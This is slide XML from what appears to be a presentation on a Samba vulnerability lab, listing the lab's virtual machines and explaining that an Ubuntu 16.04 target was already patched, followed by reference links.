            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5090575" y="1074925"/>
            <a:ext cx="2015600" cy="3835426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="829" name="Google Shape;829;p96"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7128400" y="1002348"/>
            <a:ext cx="2015600" cy="398058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5"/>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Devices</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Google Shape;295;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1220838"/>
            <a:ext cx="8520600" cy="4017300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Kali Linux 2021.1 </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>(NAT Network Setting)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Ubuntu 14.04.5 Server</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>(NAT &amp; Host-Only Network Setting)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Windows Server 2019 </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>(Host-Only Network Setting)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Google Shape;296;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876837" y="2409598"/>
            <a:ext cx="2681532" cy="1732190"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="114110" w="176649">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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5005199" y="2541755"/>
            <a:ext cx="2424808" cy="1467860"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="96697" w="159737">
                <a:moveTo>
                  <a:pt x="0" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="96697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159737" y="96697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15973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91A51"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="Google Shape;298;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4636011" y="4136703"/>
            <a:ext cx="3163178" cy="83900"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="5527" w="208378">
                <a:moveTo>
                  <a:pt x="0" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="5526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208377" y="5526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2083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99" name="Google Shape;299;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5005199" y="2541755"/>
            <a:ext cx="2424808" cy="141083"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="9294" w="159737">
                <a:moveTo>
                  <a:pt x="0" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="9294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159737" y="9294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15973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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5143716" y="2742556"/>
            <a:ext cx="1029417" cy="521069"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="34326" w="67814">
                <a:moveTo>
                  <a:pt x="1" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="34326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67813" y="34326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5221240" y="2834061"/>
            <a:ext cx="297407" cy="297391"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="19591" w="19592">
                <a:moveTo>
                  <a:pt x="1" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="19591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19591" y="19591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5500826" y="3535575"/>
            <a:ext cx="908690" cy="329163"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="21684" w="59861">
                <a:moveTo>
                  <a:pt x="1" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="21684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59860" y="21684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="598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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5560559" y="3610549"/>
            <a:ext cx="679927" cy="53403"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="3518" w="44791">
                <a:moveTo>
                  <a:pt x="1" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="3517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44791" y="3517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479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304" name="Google Shape;304;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5560559" y="3710949"/>
            <a:ext cx="526154" cy="52128"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="3434" w="34661">
                <a:moveTo>
                  <a:pt x="1" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="3433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34661" y="3433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3466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305" name="Google Shape;305;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5180573" y="3535575"/>
            <a:ext cx="322818" cy="329163"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="21684" w="21266">
                <a:moveTo>
                  <a:pt x="1" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="21684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21265" y="21684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5242842" y="3644719"/>
            <a:ext cx="218729" cy="109463"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="7211" w="14409">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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5683836" y="3292847"/>
            <a:ext cx="704079" cy="155049"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="10214" w="46382">
                <a:moveTo>
                  <a:pt x="1" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="10214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46381" y="10214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="463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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5683836" y="3100941"/>
            <a:ext cx="704079" cy="155064"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="10215" w="46382">
                <a:moveTo>
                  <a:pt x="1" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="10214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46381" y="10214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4638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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6387899" y="3102216"/>
            <a:ext cx="155049" cy="155049"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="10214" w="10214">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="10214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10214" y="10214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10214" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6579790" y="3182275"/>
            <a:ext cx="744746" cy="714234"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="47051" w="49061">
                <a:moveTo>
                  <a:pt x="1" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="47051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49060" y="47051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4906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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668745" y="3215322"/>
            <a:ext cx="728230" cy="623427"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="41069" w="47973">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312" name="Google Shape;312;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6905128" y="3364010"/>
            <a:ext cx="186835" cy="328040"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="21610" w="12308">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313" name="Google Shape;313;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858115" y="1367491"/>
            <a:ext cx="1476741" cy="1959677"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="129096" w="97282">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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6976307" y="1511094"/>
            <a:ext cx="1241633" cy="1500907"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="98874" w="81794">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="98873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81794" y="98873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8179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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7513876" y="3086960"/>
            <a:ext cx="185560" cy="159086"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="10480" w="12224">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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7577419" y="1730946"/>
            <a:ext cx="584612" cy="583352"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="38429" w="38512">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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7107204" y="1832622"/>
            <a:ext cx="432099" cy="430839"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="28382" w="28465">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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7225395" y="2240569"/>
            <a:ext cx="636710" cy="635450"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="41861" w="41944">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97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="256625" y="226025"/>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Why Ubuntu 16.04 didn’t work</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="835" name="Google Shape;835;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="310600" y="4212025"/>
            <a:ext cx="8106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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>We first experimented with version 16.04 as we thought that it being in the range of the vulnerable versions, the Debian Free Software Guidelines versioning was already patched for these series of OSes</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="836" name="Google Shape;836;p97"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="681075" y="1157388"/>
            <a:ext cx="5743356" cy="28287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98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="256625" y="226025"/>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Why Ubuntu 16.04 didn’t work</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="842" name="Google Shape;842;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="1970" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="32050" y="1272775"/>
            <a:ext cx="5219077" cy="1863600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="843" name="Google Shape;843;p98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295650" y="3828450"/>
            <a:ext cx="8106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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Although the versioning was generally vulnerable as detected using nmap, it wasn’t susceptible since it already had been patched. We can verify this by using the “apt-check-versions” package. We found this in the README file on the exploit.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="844" name="Google Shape;844;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4555466" y="741025"/>
            <a:ext cx="4446350" cy="29271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99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4132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References</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="850" name="Google Shape;850;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1019850"/>
            <a:ext cx="8520600" cy="358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00" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://wiki.samba.org/index.php/Build_Samba_from_Source</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt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1300">
              <a:solidFill>
                <a:schemeClr val="lt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lang="es" sz="1300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://packages.debian.org/jessie/samba</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt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1300">
              <a:solidFill>
                <a:schemeClr val="lt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lang="es" sz="1300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://releases.ubuntu.com/16.04/</a:t>
            </a:r>
